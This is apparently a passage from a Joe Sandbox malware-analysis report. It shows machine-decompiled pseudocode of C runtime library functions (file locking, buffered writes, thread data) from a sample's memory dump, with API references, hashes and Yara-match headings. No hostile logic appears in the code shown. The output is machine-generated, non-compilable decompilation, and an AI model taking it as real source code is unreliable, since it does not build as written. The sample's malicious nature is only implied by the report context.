                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                        						if(_t21 == 0xfffffffe) {
                                                                        							goto L6;
                                                                        						} else {
                                                                        							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                        							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                        						}
                                                                        					}
                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                        					_v8 = 0xfffffffe;
                                                                        					E0040C735(_t39);
                                                                        					_t19 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t27 = E0040BFC1(_t51);
                                                                        					_t40 = 0x16;
                                                                        					 *_t27 = _t40;
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					E0040E744(__edx, _t40, 0);
                                                                        					_t19 = _t40;
                                                                        				}
                                                                        				return E0040E21D(_t19);
                                                                        			}













                                                                        0x0040c73d
                                                                        0x0040c690
                                                                        0x0040c692
                                                                        0x0040c697
                                                                        0x0040c69e
                                                                        0x0040c6a3
                                                                        0x0040c6a8
                                                                        0x0040c6aa
                                                                        0x0040c6c8
                                                                        0x0040c6ce
                                                                        0x0040c6d1
                                                                        0x0040c6d6
                                                                        0x0040c6dc
                                                                        0x0040c6df
                                                                        0x0040c70f
                                                                        0x0040c70f
                                                                        0x0040c6e1
                                                                        0x0040c6e2
                                                                        0x0040c6e8
                                                                        0x0040c6eb
                                                                        0x00000000
                                                                        0x0040c6ed
                                                                        0x0040c6ee
                                                                        0x0040c70b
                                                                        0x0040c70b
                                                                        0x0040c6eb
                                                                        0x0040c714
                                                                        0x0040c71b
                                                                        0x0040c71e
                                                                        0x0040c725
                                                                        0x0040c72a
                                                                        0x0040c72a
                                                                        0x0040c6ac
                                                                        0x0040c6ac
                                                                        0x0040c6b3
                                                                        0x0040c6b4
                                                                        0x0040c6b6
                                                                        0x0040c6b7
                                                                        0x0040c6b8
                                                                        0x0040c6b9
                                                                        0x0040c6ba
                                                                        0x0040c6bb
                                                                        0x0040c6c3
                                                                        0x0040c6c3
                                                                        0x0040c731

                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2805327698-0
                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t15;
                                                                        				LONG* _t21;
                                                                        				long _t23;
                                                                        				void* _t31;
                                                                        				LONG* _t33;
                                                                        				void* _t34;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __eflags;
                                                                        				_t29 = __edx;
                                                                        				_t25 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x421490);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                        				_t15 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                        					E0040D6E0(_t25, 0xd);
                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                        					__eflags = _t33 -  *0x422d38; // 0x871660
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _t33;
                                                                        						if(_t33 != 0) {
                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                        							__eflags = _t23;
                                                                        							if(_t23 == 0) {
                                                                        								__eflags = _t33 - 0x422910;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t33);
                                                                        									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t21 =  *0x422d38; // 0x871660
                                                                        						 *(_t31 + 0x68) = _t21;
                                                                        						_t33 =  *0x422d38; // 0x871660
                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                        						InterlockedIncrement(_t33);
                                                                        					}
                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                        					E00414067();
                                                                        				} else {
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        				}
                                                                        				if(_t33 == 0) {
                                                                        					E0040E79A(_t29, _t31, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t33);
                                                                        			}










                                                                        0x00413fcc
                                                                        0x00413fcc
                                                                        0x00413fcc
                                                                        0x00413fcc
                                                                        0x00413fce
                                                                        0x00413fd3
                                                                        0x00413fdd
                                                                        0x00413fdf
                                                                        0x00413fe7
                                                                        0x00414008
                                                                        0x0041400e
                                                                        0x00414012
                                                                        0x00414015
                                                                        0x00414018
                                                                        0x0041401e
                                                                        0x00414020
                                                                        0x00414022
                                                                        0x00414025
                                                                        0x0041402b
                                                                        0x0041402d
                                                                        0x0041402f
                                                                        0x00414035
                                                                        0x00414037
                                                                        0x00414038
                                                                        0x0041403d
                                                                        0x00414035
                                                                        0x0041402d
                                                                        0x0041403e
                                                                        0x00414043
                                                                        0x00414046
                                                                        0x0041404c
                                                                        0x00414050
                                                                        0x00414050
                                                                        0x00414056
                                                                        0x0041405d
                                                                        0x00413fef
                                                                        0x00413fef
                                                                        0x00413fef
                                                                        0x00413ff4
                                                                        0x00413ff8
                                                                        0x00413ffd
                                                                        0x00414005

                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                        • __lock.LIBCMT ref: 00414008
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                        • InterlockedIncrement.KERNEL32(00871660), ref: 00414050
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 4271482742-0
                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00413610() {
                                                                        				signed long long _v12;
                                                                        				signed int _v20;
                                                                        				signed long long _v28;
                                                                        				signed char _t8;
                                                                        
                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                        				if(_t8 == 0) {
                                                                        					L6:
                                                                        					_v20 =  *0x41fb50;
                                                                        					_v28 =  *0x41fb48;
                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                        					asm("fld1");
                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                        					asm("fnstsw ax");
                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                        						return 0;
                                                                        					} else {
                                                                        						return 1;
                                                                        					}
                                                                        				} else {
                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                        					if(__eax == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_push(0);
                                                                        						return __eax;
                                                                        					}
                                                                        				}
                                                                        			}







                                                                        0x00413615
                                                                        0x0041361d
                                                                        0x00413634
                                                                        0x004135e0
                                                                        0x004135e9
                                                                        0x004135f5
                                                                        0x004135f8
                                                                        0x004135fb
                                                                        0x004135fd
                                                                        0x00413600
                                                                        0x00413605
                                                                        0x0041360f
                                                                        0x00413607
                                                                        0x0041360b
                                                                        0x0041360b
                                                                        0x0041361f
                                                                        0x00413625
                                                                        0x0041362d
                                                                        0x00000000
                                                                        0x0041362f
                                                                        0x0041362f
                                                                        0x00413633
                                                                        0x00413633
                                                                        0x0041362d

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                        • API String ID: 1646373207-3105848591
                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				signed int _t70;
                                                                        				signed int _t71;
                                                                        				intOrPtr _t73;
                                                                        				signed int _t75;
                                                                        				signed int _t81;
                                                                        				char _t82;
                                                                        				signed int _t84;
                                                                        				intOrPtr* _t86;
                                                                        				signed int _t87;
                                                                        				intOrPtr* _t90;
                                                                        				signed int _t92;
                                                                        				signed int _t94;
                                                                        				void* _t96;
                                                                        				signed char _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr _t102;
                                                                        				signed int _t103;
                                                                        				intOrPtr* _t104;
                                                                        				signed int _t111;
                                                                        				signed int _t114;
                                                                        				intOrPtr _t115;
                                                                        
                                                                        				_t105 = __esi;
                                                                        				_t97 = __edx;
                                                                        				_t104 = _a4;
                                                                        				_t87 = 0;
                                                                        				_t121 = _t104;
                                                                        				if(_t104 != 0) {
                                                                        					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                        					__eflags =  *(_t104 + 4);
                                                                        					_v8 = _t70;
                                                                        					if(__eflags < 0) {
                                                                        						 *(_t104 + 4) = 0;
                                                                        					}
                                                                        					_push(1);
                                                                        					_push(_t87);
                                                                        					_push(_t70);
                                                                        					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                        					__eflags = _t71 - _t87;
                                                                        					_v12 = _t71;
                                                                        					if(_t71 < _t87) {
                                                                        						L2:
                                                                        						return _t71 | 0xffffffff;
                                                                        					} else {
                                                                        						_t98 =  *(_t104 + 0xc);
                                                                        						__eflags = _t98 & 0x00000108;
                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                        							_t73 =  *_t104;
                                                                        							_t92 =  *(_t104 + 8);
                                                                        							_push(_t105);
                                                                        							_v16 = _t73 - _t92;
                                                                        							__eflags = _t98 & 0x00000003;
                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                        								__eflags = _t98;
                                                                        								if(__eflags < 0) {
                                                                        									L15:
                                                                        									__eflags = _v12 - _t87;
                                                                        									if(_v12 != _t87) {
                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                        											L40:
                                                                        											_t75 = _v16 + _v12;
                                                                        											__eflags = _t75;
                                                                        											L41:
                                                                        											return _t75;
                                                                        										}
                                                                        										_t99 =  *(_t104 + 4);
                                                                        										__eflags = _t99 - _t87;
                                                                        										if(_t99 != _t87) {
                                                                        											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                        											if(__eflags == 0) {
                                                                        												L39:
                                                                        												_t66 =  &_v12;
                                                                        												 *_t66 = _v12 - _a4;
                                                                        												__eflags =  *_t66;
                                                                        												goto L40;
                                                                        											}
                                                                        											_push(2);
                                                                        											_push(0);
                                                                        											_push(_v8);
                                                                        											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                        											if(__eflags != 0) {
                                                                        												_push(0);
                                                                        												_push(_v12);
                                                                        												_push(_v8);
                                                                        												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                        												__eflags = _t81;
                                                                        												if(_t81 >= 0) {
                                                                        													_t82 = 0x200;
                                                                        													__eflags = _a4 - 0x200;
                                                                        													if(_a4 > 0x200) {
                                                                        														L35:
                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                        														L36:
                                                                        														_a4 = _t82;
                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                        														L37:
                                                                        														if(__eflags != 0) {
                                                                        															_t63 =  &_a4;
                                                                        															 *_t63 = _a4 + 1;
                                                                        															__eflags =  *_t63;
                                                                        														}
                                                                        														goto L39;
                                                                        													}
                                                                        													_t94 =  *(_t104 + 0xc);
                                                                        													__eflags = _t94 & 0x00000008;
                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                        														goto L35;
                                                                        													}
                                                                        													__eflags = _t94 & 0x00000400;
                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                        														goto L36;
                                                                        													}
                                                                        													goto L35;
                                                                        												}
                                                                        												L31:
                                                                        												_t75 = _t81 | 0xffffffff;
                                                                        												goto L41;
                                                                        											}
                                                                        											_t84 =  *(_t104 + 8);
                                                                        											_t96 = _a4 + _t84;
                                                                        											while(1) {
                                                                        												__eflags = _t84 - _t96;
                                                                        												if(_t84 >= _t96) {
                                                                        													break;
                                                                        												}
                                                                        												__eflags =  *_t84 - 0xa;
                                                                        												if( *_t84 == 0xa) {
                                                                        													_t44 =  &_a4;
                                                                        													 *_t44 = _a4 + 1;
                                                                        													__eflags =  *_t44;
                                                                        												}
                                                                        												_t84 = _t84 + 1;
                                                                        												__eflags = _t84;
                                                                        											}
                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                        											goto L37;
                                                                        										}
                                                                        										_v16 = _t87;
                                                                        										goto L40;
                                                                        									}
                                                                        									_t75 = _v16;
                                                                        									goto L41;
                                                                        								}
                                                                        								_t81 = E0040BFC1(__eflags);
                                                                        								 *_t81 = 0x16;
                                                                        								goto L31;
                                                                        							}
                                                                        							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t103 = _t92;
                                                                        							__eflags = _t103 - _t73;
                                                                        							if(_t103 >= _t73) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t115 = _t73;
                                                                        							do {
                                                                        								__eflags =  *_t103 - 0xa;
                                                                        								if( *_t103 == 0xa) {
                                                                        									_v16 = _v16 + 1;
                                                                        									_t87 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								_t103 = _t103 + 1;
                                                                        								__eflags = _t103 - _t115;
                                                                        							} while (_t103 < _t115);
                                                                        							goto L15;
                                                                        						}
                                                                        						return _t71 -  *(_t104 + 4);
                                                                        					}
                                                                        				}
                                                                        				_t86 = E0040BFC1(_t121);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				 *_t86 = 0x16;
                                                                        				_t71 = E0040E744(__edx, _t104, __esi);
                                                                        				goto L2;
                                                                        			}






























                                                                        0x0040c748
                                                                        0x0040c748
                                                                        0x0040c752
                                                                        0x0040c755
                                                                        0x0040c757
                                                                        0x0040c759
                                                                        0x0040c77c
                                                                        0x0040c781
                                                                        0x0040c785
                                                                        0x0040c788
                                                                        0x0040c78a
                                                                        0x0040c78a
                                                                        0x0040c78d
                                                                        0x0040c78f
                                                                        0x0040c790
                                                                        0x0040c791
                                                                        0x0040c799
                                                                        0x0040c79b
                                                                        0x0040c79e
                                                                        0x0040c773
                                                                        0x00000000
                                                                        0x0040c7a0
                                                                        0x0040c7a0
                                                                        0x0040c7a3
                                                                        0x0040c7a9
                                                                        0x0040c7b3
                                                                        0x0040c7b5
                                                                        0x0040c7b8
                                                                        0x0040c7bd
                                                                        0x0040c7c0
                                                                        0x0040c7c3
                                                                        0x0040c806
                                                                        0x0040c808
                                                                        0x0040c7f9
                                                                        0x0040c7f9
                                                                        0x0040c7fc
                                                                        0x0040c81a
                                                                        0x0040c81e
                                                                        0x0040c8d8
                                                                        0x0040c8de
                                                                        0x0040c8de
                                                                        0x0040c8e0
                                                                        0x00000000
                                                                        0x0040c8e0
                                                                        0x0040c824
                                                                        0x0040c827
                                                                        0x0040c829
                                                                        0x0040c843
                                                                        0x0040c84a
                                                                        0x0040c84f
                                                                        0x0040c852
                                                                        0x0040c857
                                                                        0x0040c8d2
                                                                        0x0040c8d5
                                                                        0x0040c8d5
                                                                        0x0040c8d5
                                                                        0x00000000
                                                                        0x0040c8d5
                                                                        0x0040c859
                                                                        0x0040c85b
                                                                        0x0040c85d
                                                                        0x0040c868
                                                                        0x0040c86b
                                                                        0x0040c88d
                                                                        0x0040c88f
                                                                        0x0040c892
                                                                        0x0040c895
                                                                        0x0040c89d
                                                                        0x0040c89f
                                                                        0x0040c8a6
                                                                        0x0040c8ab
                                                                        0x0040c8ae
                                                                        0x0040c8c0
                                                                        0x0040c8c0
                                                                        0x0040c8c3
                                                                        0x0040c8c3
                                                                        0x0040c8c8
                                                                        0x0040c8cd
                                                                        0x0040c8cd
                                                                        0x0040c8cf
                                                                        0x0040c8cf
                                                                        0x0040c8cf
                                                                        0x0040c8cf
                                                                        0x00000000
                                                                        0x0040c8cd
                                                                        0x0040c8b0
                                                                        0x0040c8b3
                                                                        0x0040c8b6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c8b8
                                                                        0x0040c8be
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c8be
                                                                        0x0040c8a1
                                                                        0x0040c8a1
                                                                        0x00000000
                                                                        0x0040c8a1
                                                                        0x0040c86d
                                                                        0x0040c873
                                                                        0x0040c880
                                                                        0x0040c880
                                                                        0x0040c882
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c877
                                                                        0x0040c87a
                                                                        0x0040c87c
                                                                        0x0040c87c
                                                                        0x0040c87c
                                                                        0x0040c87c
                                                                        0x0040c87f
                                                                        0x0040c87f
                                                                        0x0040c87f
                                                                        0x0040c884
                                                                        0x00000000
                                                                        0x0040c884
                                                                        0x0040c82b
                                                                        0x00000000
                                                                        0x0040c82b
                                                                        0x0040c7fe
                                                                        0x00000000
                                                                        0x0040c7fe
                                                                        0x0040c80a
                                                                        0x0040c80f
                                                                        0x00000000
                                                                        0x0040c80f
                                                                        0x0040c7ce
                                                                        0x0040c7d8
                                                                        0x0040c7db
                                                                        0x0040c7e0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c7e2
                                                                        0x0040c7e4
                                                                        0x0040c7e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c7e8
                                                                        0x0040c7ea
                                                                        0x0040c7ea
                                                                        0x0040c7ed
                                                                        0x0040c7ef
                                                                        0x0040c7f2
                                                                        0x0040c7f2
                                                                        0x0040c7f2
                                                                        0x0040c7f4
                                                                        0x0040c7f5
                                                                        0x0040c7f5
                                                                        0x00000000
                                                                        0x0040c7ea
                                                                        0x00000000
                                                                        0x0040c7ab
                                                                        0x0040c79e
                                                                        0x0040c75b
                                                                        0x0040c760
                                                                        0x0040c761
                                                                        0x0040c762
                                                                        0x0040c763
                                                                        0x0040c764
                                                                        0x0040c765
                                                                        0x0040c76b
                                                                        0x00000000

                                                                        APIs
                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                        • __locking.LIBCMT ref: 0040C791
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 2395185920-0
                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t61;
                                                                        				signed int _t63;
                                                                        				void* _t68;
                                                                        				signed int _t69;
                                                                        				signed int _t72;
                                                                        				signed int _t74;
                                                                        				signed int _t75;
                                                                        				signed int _t77;
                                                                        				signed int _t78;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t84;
                                                                        				signed int _t88;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t101;
                                                                        
                                                                        				_t90 = __edx;
                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t100 = _a16;
                                                                        					_t105 = _t100;
                                                                        					if(_t100 != 0) {
                                                                        						_t82 = _a4;
                                                                        						__eflags = _t82;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t63 = _t59 | 0xffffffff;
                                                                        						_t90 = _t63 % _a8;
                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                        						if(__eflags > 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t97 = _a8 * _a12;
                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                        						_v8 = _t82;
                                                                        						_v16 = _t97;
                                                                        						_t81 = _t97;
                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                        							_v12 = 0x1000;
                                                                        						} else {
                                                                        							_v12 =  *(_t100 + 0x18);
                                                                        						}
                                                                        						__eflags = _t97;
                                                                        						if(_t97 == 0) {
                                                                        							L32:
                                                                        							return _a12;
                                                                        						} else {
                                                                        							do {
                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                        								__eflags = _t84;
                                                                        								if(_t84 == 0) {
                                                                        									L18:
                                                                        									__eflags = _t81 - _v12;
                                                                        									if(_t81 < _v12) {
                                                                        										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                        										__eflags = _t68 - 0xffffffff;
                                                                        										if(_t68 == 0xffffffff) {
                                                                        											L34:
                                                                        											_t69 = _t97;
                                                                        											L35:
                                                                        											return (_t69 - _t81) / _a8;
                                                                        										}
                                                                        										_v8 = _v8 + 1;
                                                                        										_t72 =  *(_t100 + 0x18);
                                                                        										_t81 = _t81 - 1;
                                                                        										_v12 = _t72;
                                                                        										__eflags = _t72;
                                                                        										if(_t72 <= 0) {
                                                                        											_v12 = 1;
                                                                        										}
                                                                        										goto L31;
                                                                        									}
                                                                        									__eflags = _t84;
                                                                        									if(_t84 == 0) {
                                                                        										L21:
                                                                        										__eflags = _v12;
                                                                        										_t98 = _t81;
                                                                        										if(_v12 != 0) {
                                                                        											_t75 = _t81;
                                                                        											_t90 = _t75 % _v12;
                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                        											__eflags = _t98;
                                                                        										}
                                                                        										_push(_t98);
                                                                        										_push(_v8);
                                                                        										_push(E0040FA20(_t90, _t98, _t100));
                                                                        										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                        										_t101 = _t101 + 0xc;
                                                                        										__eflags = _t74 - 0xffffffff;
                                                                        										if(_t74 == 0xffffffff) {
                                                                        											L36:
                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                        											_t69 = _v16;
                                                                        											goto L35;
                                                                        										} else {
                                                                        											_t88 = _t98;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 <= _t98) {
                                                                        												_t88 = _t74;
                                                                        											}
                                                                        											_v8 = _v8 + _t88;
                                                                        											_t81 = _t81 - _t88;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 < _t98) {
                                                                        												goto L36;
                                                                        											} else {
                                                                        												L27:
                                                                        												_t97 = _v16;
                                                                        												goto L31;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t77 = E0040C1FB(_t100);
                                                                        									__eflags = _t77;
                                                                        									if(_t77 != 0) {
                                                                        										goto L34;
                                                                        									}
                                                                        									goto L21;
                                                                        								}
                                                                        								_t78 =  *(_t100 + 4);
                                                                        								__eflags = _t78;
                                                                        								if(__eflags == 0) {
                                                                        									goto L18;
                                                                        								}
                                                                        								if(__eflags < 0) {
                                                                        									_t48 = _t100 + 0xc;
                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                        									__eflags =  *_t48;
                                                                        									goto L34;
                                                                        								}
                                                                        								_t99 = _t81;
                                                                        								__eflags = _t81 - _t78;
                                                                        								if(_t81 >= _t78) {
                                                                        									_t99 = _t78;
                                                                        								}
                                                                        								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                        								 *_t100 =  *_t100 + _t99;
                                                                        								_t101 = _t101 + 0xc;
                                                                        								_t81 = _t81 - _t99;
                                                                        								_v8 = _v8 + _t99;
                                                                        								goto L27;
                                                                        								L31:
                                                                        								__eflags = _t81;
                                                                        							} while (_t81 != 0);
                                                                        							goto L32;
                                                                        						}
                                                                        					}
                                                                        					L3:
